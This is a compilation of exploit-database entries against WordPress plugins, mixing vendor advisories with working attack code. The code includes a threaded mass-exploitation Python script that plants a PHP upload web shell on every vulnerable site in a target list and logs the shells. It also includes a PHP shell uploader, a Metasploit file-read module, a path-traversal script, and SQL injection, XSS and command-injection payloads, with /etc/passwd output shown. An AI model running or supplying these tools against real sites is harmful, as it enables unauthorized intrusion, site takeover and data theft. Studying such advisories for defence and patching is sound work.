Language: PHP
Version: 2.0.17 and below
Vendor Status: Vendor contacted, update released
Release Date: 2017/08/07
Risk: Medium
1. General Overview
===================
During the security audit of Easy Modal plugin for WordPress CMS,
multiple vulnerabilities were discovered using DefenseCode ThunderScan
application source code security analysis platform.
More information about ThunderScan is available at URL:
http://www.defensecode.com
2. Software Overview
====================
According to the plugin developers, Easy Modal is the #1 WordPress
Popup Plugin. It's advertised as "Make glorious & powerful popups and
market your content like never before - all in minutes!".
According to wordpress.org, it has more than 20,000 active installs.
Homepage:
http://wordpress.org/extend/plugins/easy-modal/
https://easy-modal.com
3. Vulnerability Description
============================
During the security analysis, ThunderScan discovered SQL injection
vulnerabilities in Easy Modal WordPress plugin.
The easiest way to reproduce the vulnerability is to visit the
provided URL while being logged in as administrator or another user
that is authorized to access the plugin settings page. Users that do
not have full administrative privileges could abuse the database
access the vulnerability provides to either escalate their privileges
or obtain and modify database contents they were not supposed to be
able to.
The nonce token is required as the URL parameter. Token value is not
unique for each request, nor per each URL, so if the attacker manages
to obtain a valid token value, the module could be exposed to attack
vectors such as Cross Site request forgery (CSRF).
3.1. SQL injection
Function: $wpdb->query()
Variables: $_GET['id'], $_GET['ids'], $_GET['modal']
Sample URL:
http://vulnerablesite.com/wp-admin/admin.php?page=easy-modal&action=delete&id%5B0%5D=4%20AND%20SLEEP(5)&easy-modal_nonce=xxx
File: easy-modal\classes\controller\admin\modals.php
---------
93 $ids = is_array($_GET['id']) ? $_GET['id'] :
array($_GET['id']);
...
97 $ids = $_GET['ids'];
...
101 $ids = $_GET['modal'];
...
110 $wpdb->query("UPDATE {$wpdb->prefix}em_modals SET
is_trash = 1 WHERE id IN (".implode(',', $ids).")");
---------
3.2. SQL injection
Function: $wpdb->query()
Variables: $_GET['id'], $_GET['ids'], $_GET['modal']
Sample URL:
http://vulnerablesite.com/wp-admin/admin.php?easy-modal_nonce=xxx&_wp_http_referer=%2Fvulnerablesite.com%2Fwp-admin%2Fadmin.php%3Fpage%3Deasy-modal%26status%3Dtrash&page=easy-modal&action=untrash&paged=1&id[]=2)%20AND%20SLEEP(10)--%20ZpVQ&action2=-1
File: easy-modal\classes\controller\admin\modals.php
---------
123 $ids = is_array($_GET['id']) ? $_GET['id'] :
array($_GET['id']);
...
127 $ids = $_GET['ids'];
...
131 $ids = $_GET['modal'];
...
140 $wpdb->query("UPDATE {$wpdb->prefix}em_modals SET
is_trash = 0 WHERE id IN ($ids)");
---------
4. Solution
===========
Vendor resolved the security issues after we reported the
vulnerability. All users are strongly advised to update WordPress Easy
Modal plugin to the latest available version.
5. Credits
==========
Discovered with DefenseCode ThunderScan source code security analyzer
by Neven Biruski.
6. Disclosure Timeline
======================
2017/04/04 Vendor contacted
2017/04/06 Vendor responded
2017/04/13 Update released
2017/08/07 Advisory released to the public
7. About DefenseCode
====================
DefenseCode L.L.C. delivers products and services designed to analyze
and test web, desktop and mobile applications for security
vulnerabilities.
DefenseCode ThunderScan is a SAST (Static Application Security
Testing, WhiteBox Testing) solution for performing extensive security
audits of application source code. ThunderScan SAST performs fast and
accurate analyses of large and complex source code projects delivering
precise results and low false positive rate.
DefenseCode WebScanner is a DAST (Dynamic Application Security
Testing, BlackBox Testing) solution for comprehensive security audits
of active web applications. WebScanner will test a website's security
by carrying out a large number of attacks using the most advanced
techniques, just as a real attacker would.
Subscribe for free software trial on our website
http://www.defensecode.com/ .
E-mail: defensecode[at]defensecode.com
Website: http://www.defensecode.com
Twitter: https://twitter.com/DefenseCode/
# Exploit Title: WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS
# Date: 2/27/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/easy-cookies-policy/
# Version: 1.6.2
# Tested on: Windows 10
# CVE: CVE-2021-24405
1. Description:
Broken access control allows any authenticated user to change the cookie banner through a POST request to admin-ajax.php.
If users can't register, this can be done through CSRF.
2. Proof of Concept:
POST http://localhost/wp-admin/admin-ajax.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/wp-admin/options-general.php?page=easy-cookies-policy
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 226
Origin: http://localhost
Connection: keep-alive
Host: localhost
Cookie: [Any authenticated user]
action=easy_cookies_policy_save_settings&maintext=<script>alert(1)</script>&background=black&transparency=90&close=accept&expires=365&enabled=true&display=fixed&position=top&button_text=Accept&text_color=#dddddd
# Exploit Title: WordPress Plugin Easy Contact Form 1.1.7 - 'Name' Stored Cross-Site Scripting (XSS)
# Date: 14/01/2021
# Exploit Author: Rahul Ramakant Singh
# Vendor Homepage: https://ghozylab.com/plugins/
# Software Link: https://demo.ghozylab.com/plugins/easy-contact-form-plugin/
# Version: 1.1.7
# Tested on Windows
Steps:
1. Install WordPress 5.6
2. Install and activate *Contact Form Plugin* plugin.
3. Go to * Contact Form Plugin *plugin section and click on the add new form button.
4. Fill all required details and click on the save button and capture the request in a proxy tool like burp suite.
5. Append the JavaScript payload in the "Email Header" field as mentioned below
*"<sc><svg/onload=alert(454)>"*
6. You will observe that the payload is stored, reflected in the response and executed, producing a pop-up.
source: https://www.securityfocus.com/bid/64167/info
WordPress Easy Career Openings plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/career-details/?jobid=3'[Sql Injection]
# Exploit Title: WordPress Plugin dzs-zoomsounds - Remote Code Execution (RCE) (Unauthenticated)
# Google Dork: inurl:wp-content/plugins/dzs-zoomsounds
# Date: 16/02/2022
# Exploit Author: Overthinker1877 (1877 Team)
# Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/
# Version: 6.60
# Tested on: Windows / Linux
import os
import requests
import threading
from multiprocessing.dummy import Pool,Lock
from bs4 import BeautifulSoup
import time
import smtplib,sys,ctypes
from random import choice
from colorama import Fore
from colorama import Style
from colorama import init
import re
import time
from time import sleep
# Colour/style shorthands used by the status printers below. autoreset=True
# makes colorama restore the default terminal colour after every print().
init(autoreset=True)

fr, gr, fc, fw, fy, fg = (
    Fore.RED, Fore.BLUE, Fore.CYAN, Fore.WHITE, Fore.YELLOW, Fore.GREEN,
)
sd, sn, sb = Style.DIM, Style.NORMAL, Style.BRIGHT

# Running tallies of hosts that could not / could be exploited; finder()
# updates them and the console title shows them.
Bad = 0
Good = 0
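def Folder(directory):
    """Create ``directory`` (and any missing parents) if it does not exist yet.

    Used once at start-up to make sure the ``exploited`` output directory is
    present before finder() appends to ``exploited/shell.txt``.

    :param directory: path of the directory to create
    :raises OSError: if the directory cannot be created (permissions, a file
        of the same name, ...)
    """
    # exist_ok=True replaces the exists-then-create check, which had a
    # window in which another process could create the directory and make
    # makedirs() raise FileExistsError.
    os.makedirs(directory, exist_ok=True)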
Folder("exploited")
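def clear():
    """Clear the terminal screen, best effort.

    Runs ``cls`` on Windows and ``clear`` everywhere else. A failure to run
    the command is ignored: a missing clear utility must not abort the scan.
    """
    command = 'cls' if os.name == 'nt' else 'clear'
    try:
        os.system(command)
    except OSError:
        # Narrowed from a bare ``except`` so that KeyboardInterrupt and
        # genuine programming errors are no longer silently swallowed.
        pass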
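def finder(i):
    """Try to drop the PHP uploader on one target and record the outcome.

    ``i`` is a base URL such as ``http://example.com``. The function first
    fetches ``savepng.php?location=1877.php``; a vulnerable install answers
    with ``error:http raw post data does not exist``. It then POSTs a PHP
    upload form as the raw request body, which the plugin writes to
    ``1877.php`` inside its own directory, and counts the host as exploited
    when that file serves the marker string ``Overthinker1877``.

    Results are printed, exploited URLs are appended to
    ``exploited/shell.txt``, and the process/console title is refreshed with
    the running tallies. Any error while talking to this host is ignored so
    one bad target does not stop the thread pool.

    Note: ``Good``/``Bad`` are updated from several Pool threads without a
    lock, so the final counts are approximate.
    """
    global Bad, Good
    head = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'}
    # Every path below starts with '/', so drop a trailing slash from the
    # base URL instead of producing 'host//wp-content/...'.
    base = i.rstrip('/')
    try:
        x = requests.session()
        # Kept as a list so further vulnerable endpoints can be added without
        # touching the control flow.
        listaa = ['/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php']
        for script in listaa:
            url = base + script
            # Bounded timeouts: an unresponsive host used to hang the thread forever.
            req_first = x.get(url, headers=head, timeout=45)
            if "error:http raw post data does not exist" not in req_first.text:
                Bad = Bad + 1
                print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Not Vuln")
                continue
            burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Connection": "close"}
            burp0_data = "<?php\r\nerror_reporting(0);\r\necho(base64_decode(\"T3ZlcnRoaW5rZXIxODc3Ijxmb3JtIG1ldGhvZD0nUE9TVCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+PGlucHV0IHR5cGU9J2ZpbGUnbmFtZT0nZicgLz48aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0ndXAnIC8+PC9mb3JtPiI=\"));\r\n@copy($_FILES['f']['tmp_name'],$_FILES['f']['name']);\r\necho(\"<a href=\".$_FILES['f']['name'].\">\".$_FILES['f']['name'].\"</a>\");\r\n?>"
            requests.post(url, headers=burp0_headers, data=burp0_data, timeout=45)
            urlx = base + "/wp-content/plugins/dzs-zoomsounds/1877.php"
            req_second = x.get(urlx, headers=head, timeout=45)
            if "Overthinker1877" in req_second.text:
                Good = Good + 1
                print(fg+"Exploited "+fw+">> "+fg+" = "+urlx)
                # The context manager closes the file; no explicit close() needed.
                with open("exploited/shell.txt", "a") as file:
                    file.write(urlx+"\n")
            else:
                Bad = Bad + 1
                print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Can't Exploit")
    except Exception:
        # Narrowed from a bare ``except`` so Ctrl-C (KeyboardInterrupt) still
        # stops the scan; any other failure on this host is still ignored.
        pass
    if os.name == 'nt':
        ctypes.windll.kernel32.SetConsoleTitleW('1877Exploit | Exploited-{} | Not Vuln-{}'.format(Good, Bad))
    else:
        sys.stdout.write('\x1b]2; 1877Exploit | Exploited-{} | Not Vuln-{}\x07'.format(Good, Bad))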
def key_logo():
    """Print the tool banner line by line, each in a random bold ANSI colour."""
    reset = '\x1b[0m'
    palette = [36, 32, 34, 35, 31, 37]
    banner = ' [ + ] OVERTHINKER1877 EXPLOIT'
    for text in banner.split('\n'):
        colour = choice(palette)
        sys.stdout.write('\x1b[1;%dm%s%s\n' % (colour, text, reset))
        # Short pause so the banner "types" onto the screen.
        time.sleep(0.05)
def process(line):
    """Placeholder worker: pause for one second and ignore ``line``.

    Not referenced by run(), which maps finder() over the target list.
    """
    sleep(1)
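def run():
    """Interactive entry point: show the banner, read a target list, scan it.

    Prompts for a file of base URLs (one per line) and a thread count, then
    hands every non-empty line to finder() through a thread pool.

    :raises OSError: if the target list cannot be opened
    :raises ValueError: if the thread count is not an integer
    """
    key_logo()
    clear()
    print("""
[-] -----------------------------------------[-]
[+] WwW.1877.TeaM
[-] -----------------------------------------[-]
\n \n""")
    file_name = input("Website List : ")
    # Read inside a context manager so the handle is closed; blank lines are
    # dropped instead of being sent to finder() as empty URLs.
    with open(file_name, 'r') as handle:
        targets = [line.strip() for line in handle.read().splitlines() if line.strip()]
    pool = Pool(int(input('Thread : ')))
    try:
        pool.map(finder, targets)
    finally:
        # Always release the worker threads, even if a target raises.
        pool.close()
        pool.join()


run()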
###################################################################################################
# Exploit Title: WordPress dzs-zoomsounds Plugins Remote File Upload Vulnerability
# Vendor : http://digitalzoomstudio.net/docs/wpzoomsounds/
# Author: bl4ck-dz
# Date: 28/05/2015
# Infected File: upload.php
# Category: webapps
# Google dork:inurl:/wp-content/plugins/dzs-zoomsounds/
# Tested on : Linux | Windows
###################################################################################################
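<?php
// Upload $evil through the DZS ZoomSounds admin/upload.php endpoint and print
// the server's response. The plugin stores the multipart "file_field" upload
// under admin/upload/ (see the shell URL in the advisory).
$evil = "dz.phtml";
$target = "http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload.php";

// The "@filename" form of CURLOPT_POSTFIELDS is disabled by default since
// PHP 5.6 (CURLOPT_SAFE_UPLOAD) and removed in PHP 7, so the original
// script silently posts the literal string "@dz.phtml" there. Use CURLFile
// where it exists and keep the old form only for pre-5.5 interpreters.
$upload = class_exists('CURLFile') ? new CURLFile($evil) : "@$evil";

$ch = curl_init($target);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('file_field' => $upload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
if ($postResult === false) {
    // Surface transport errors instead of printing an empty string.
    fwrite(STDERR, "curl error: " . curl_error($ch) . "\n");
}
curl_close($ch);
echo "$postResult";
?>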
Shell Access (the uploaded file, $evil = dz.phtml in the script above, is served from the plugin's upload directory):
http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload/$evil
# GreeTz : Akram Stelle ~ Mr DZ ~ All DzTeaM Members & all all Dz H4x0rs !
source: https://www.securityfocus.com/bid/68525/info
WordPress DZS-VideoGallery plugin is prone to multiple cross site scripting vulnerabilities and a command-injection vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to execute arbitrary OS commands. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
DZS-VideoGallery 7.85 is vulnerable; prior versions are also affected.
Cross-site-scripting:
http://www.example.com/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?designrand=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Command-Injection:
http://www.example.com/wp-content/plugins/dzs-videogallery/img.php?webshot=1&src=http://www.example.com/1.jpg$(os-cmd)
# Exploit Title: WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated)
# Google Dork: inurl:/wp-content/plugins/dzs-zoomsounds/
# Date: 2/12/2021
# Exploit Author: Uriel Yochpaz
# Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/
# Software Link:
# Version: 1.10, 1.20, 1.30, 1.40, 1.41, 1.43, 1.45, 1.50, 1.51, 1.60, 1.61, 1.62, 1.63, 1.70, 2.00, 2.02, 2.10, 2.20, 2.30, 2.42, 2.43, 2.44, 2.45, 2.46, 2.51, 2.60, 2.61, 2.62, 2.63, 2.64, 2.70, 2.72, 2.75, 3.00, 3.01, 3.03, 3.04, 3.10, 3.12, 3.21, 3.23, 3.24, 3.30, 3.31, 3.32, 3.33, 3.40, 4.00, 4.10, 4.15, 4.20, 4.32, 4.47, 4.51, 4.63, 5.00, 5.03, 5.04, 5.12, 5.18, 5.30, 5.31, 5.48, 5.60, 5.70, 5.82, 5.84, 5.91, 5.93, 5.95, 5.96, 6.00, 6.10, 6.21, 6.34, 6.45
# Tested on: Linux (DZS Zoomsounds version 5.82)
# CVE : CVE-2021-39316
The vulnerability allows a remote attacker to perform directory traversal attacks.
The vulnerability exists due to input validation error when processing directory traversal sequences in the "link" parameter in the "dzsap_download" action. A remote attacker can send a specially crafted HTTP request and read arbitrary files on the system.
Mitigation:
Install update from vendor's website.
Vulnerable software versions ZoomSounds:
1.10, 1.20, 1.30, 1.40, 1.41, 1.43, 1.45, 1.50, 1.51, 1.60, 1.61, 1.62, 1.63, 1.70, 2.00, 2.02, 2.10, 2.20, 2.30,
2.42, 2.43, 2.44, 2.45, 2.46, 2.51, 2.60, 2.61, 2.62, 2.63, 2.64, 2.70, 2.72, 2.75, 3.00, 3.01, 3.03, 3.04, 3.10,
3.12, 3.21, 3.23, 3.24, 3.30, 3.31, 3.32, 3.33, 3.40, 4.00, 4.10, 4.15, 4.20, 4.32, 4.47, 4.51, 4.63, 5.00, 5.03,
5.04, 5.12, 5.18, 5.30, 5.31, 5.48, 5.60, 5.70, 5.82, 5.84, 5.91, 5.93, 5.95, 5.96, 6.00, 6.10, 6.21, 6.34, 6.45
PoC:
user@ubuntu:~$ curl "http://localhost/MYzoomsounds/?action=dzsap_download&link=../../../../../../../../../../etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
user:x:1000:1000:user,,,:/home/user:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
* Exploit Title: Wordpress DZS Videogallery Plugin - Multiple Vulnerabilities <=8.60
* Discovery Date: 01.05.2016
* Public Disclosure Date:03.09.2016
* Vendor Homepage: http://digitalzoomstudio.net/
* Software Link: http://codecanyon.net/item/video-gallery-wordpress-plugin-w-youtube-vimeo-/157782
* Exploit Author: Colette Chamberland (Wordfence)
* Contact: colette@wordfence.com
* Version: <=8.60
* Tested on: Wordpress 4.2.x-4.4.x
* OVE-20160305-2497
Technical details:
Unauthenticated CSRF & XSS
POC:
http://[target]/wp-content/plugins/dzs-videogallery/admin/playlistseditor/popup.php?initer=whatava18642%27%3balert%281%29%2f%2f645
Line 13-15 (unsanitized input):
if(isset($_GET['initer'])){
$initer = $_GET['initer'];
}
Line 27 (unsanitized output):
<?php echo "var initer = '" . $initer . "';"; ?>
---------------------------------------
Unauthenticated CSRF & XSS
POC:
http://[target]/wp-content/plugins/dzs-videogallery/admin/tagseditor/popup.php?initer=whatava18642%27%3balert%281%29%2f%2f645
Line 13-15 (unsanitized input):
if(isset($_GET['initer'])){
$initer = $_GET['initer'];
}
Line 27 (unsanitized output):
<?php echo "var initer = '" . $initer . "';"; ?>
---------------------------------------
Unauthenticated CSRF & XSS:
POC(s):
http://[target]/wp-content/plugins/dzs-videogallery/ajax.php?height=&source=6d27f"><script>alert(1)<%2fscript>894ba&type=&width=
http://[target]/wp-content/plugins/dzs-videogallery/ajax.php?height=&source=&type=7934f"><script>alert(1)<%2fscript>99085&width=
http://[target]/wp-content/plugins/dzs-videogallery/ajax.php?height=&source=&type=&width=54fd7"><script>alert(1)<%2fscript>4708b
Line 25 & 35 (unsanitized input & direct output):
$w = $_GET['width'];
<param name="flashvars" value="video=' . $_GET['source'] . '&types=' . $_GET['type'] . '&defaultQuality=hd" width="' . $w . '" height="' . $h . '">'.$backup.'
source: https://www.securityfocus.com/bid/53513/info
Dynamic Widgets plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Dynamic Widgets 1.5.1 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/themes.php?page=dynwid-config&action=edit&id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
# Exploit Title: WordPress Plugin Duplicator 1.4.7 - Information Disclosure
# Google Dork: N/A
# Date: 07.27.2022
# Exploit Author: SecuriTrust
# Vendor Homepage: https://snapcreek.com/
# Software Link: https://wordpress.org/plugins/duplicator/
# Version: <= 1.4.7
# Tested on: Linux, Windows
# CVE : CVE-2022-2552
# Reference: https://securitrust.fr
# Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2552
#Product:
WordPress Plugin Duplicator <= 1.4.7
#Vulnerability:
1-Some system information may be disclosed.
#Proof-Of-Concept:
1-System information.
Some system information is obtained using the "view" parameter.
http://[PATH]/backups-dup-lite/dup-installer/main.installer.php
# Exploit Title: WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download
# Google Dork: N/A
# Date: 07.27.2022
# Exploit Author: SecuriTrust
# Vendor Homepage: https://snapcreek.com/
# Software Link: https://wordpress.org/plugins/duplicator/
# Version: < 1.4.7
# Tested on: Linux, Windows
# CVE : CVE-2022-2551
# Reference: https://securitrust.fr
# Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2551
#Product:
WordPress Plugin Duplicator < 1.4.7
#Vulnerability:
1-It allows an attacker to download the backup file.
#Proof-Of-Concept:
1-Backup download.
The backup file can be downloaded using the "is_daws" parameter.
http://[PATH]/backups-dup-lite/dup-installer/main.installer.php
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
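class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'WordPress Duplicator File Read Vulnerability',
      'Description' => %q{
        This module exploits an unauthenticated directory traversal vulnerability
        in the WordPress plugin 'Duplicator', versions 1.3.24-1.3.26, allowing
        arbitrary file read with the web server privileges. This vulnerability
        was being actively exploited when it was discovered.
      },
      'References' =>
        [
          ['CVE', '2020-11738'],
          ['WPVDB', '10078'],
          ['URL', 'https://snapcreek.com/duplicator/docs/changelog']
        ],
      'Author' =>
        [
          'Ramuel Gall', # Vulnerability discovery
          'Hoa Nguyen - SunCSR Team' # Metasploit module
        ],
      'DisclosureDate' => 'Feb 19 2020',
      'License' => MSF_LICENSE
    ))

    register_options(
      [
        OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
        OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 5])
      ]
    )
  end

  # Version check against the plugin readme. The readme lives under
  # wp-content/plugins/duplicator/, so the slug is 'duplicator'; the
  # original passed the AJAX action name, which is not a plugin directory.
  def check
    check_plugin_version_from_readme('duplicator', '1.3.27', '1.3.24')
  end

  # Fetch FILEPATH through the unauthenticated duplicator_download AJAX
  # action by prefixing DEPTH '../' segments, print it and store it as loot.
  def run_host(ip)
    traversal = '../' * datastore['DEPTH']
    # Drop a single leading '/' so the traversal prefix joins cleanly.
    filename = datastore['FILEPATH'].sub(%r{\A/}, '')

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
      'vars_get' =>
        {
          'action' => 'duplicator_download',
          # The original interpolated a placeholder here and never used
          # +filename+, so the requested path was wrong.
          'file' => "#{traversal}#{filename}"
        }
    })

    # One check per line: the original ran both on one line, which Ruby
    # does not parse.
    fail_with Failure::Unreachable, 'Connection failed' unless res
    fail_with Failure::NotVulnerable, 'Connection failed. Nothing was downloaded' if res.code != 200
    fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?

    print_status('Downloading file...')
    print_line("\n#{res.body}\n")

    fname = datastore['FILEPATH']
    path = store_loot(
      'duplicator.traversal',
      'text/plain',
      ip,
      res.body,
      fname
    )
    print_good("File saved in: #{path}")
  end
end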
# Exploit Title: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read
# Date: October 16, 2021
# Exploit Author: nam3lum
# Vendor Homepage: https://wordpress.org/plugins/duplicator/
# Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip]
# Version: 1.3.26
# Tested on: Ubuntu 16.04
# CVE : CVE-2020-11738
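import sys

import requests

# Usage: CVE-2020-11738.py <base-url> <absolute-file-path>
# Duplicator 1.3.24-1.3.26 returns whatever file the unauthenticated
# duplicator_download AJAX action is given in "file", so a '../' prefix
# walks out of the plugin directory.
if len(sys.argv) != 3:
    print("Exploit made by nam3lum.")
    print("Usage: CVE-2020-11738.py http://192.168.168.167 /etc/passwd")
    # sys.exit instead of the site-provided exit(), which is not always defined.
    sys.exit(1)

arg = sys.argv[1].rstrip("/")
file = sys.argv[2]

# Nine '../' segments (same as the original string) are more than enough to
# reach '/' from wp-admin/; extra segments are harmless since '..' of '/' is '/'.
# Stripping the leading '/' from the path keeps the URL identical for
# '/etc/passwd' and also accepts a relative path.
traversal = "../" * 9
URL = arg + "/wp-admin/admin-ajax.php?action=duplicator_download&file=" + traversal + file.lstrip("/")

try:
    # Bounded timeout so an unresponsive host does not hang the script.
    output = requests.get(url=URL, timeout=15)
except requests.RequestException as exc:
    sys.exit("request failed: %s" % exc)

if output.status_code != 200 or not output.text:
    sys.exit("no content returned (HTTP %d); target may not be vulnerable" % output.status_code)
print(output.text)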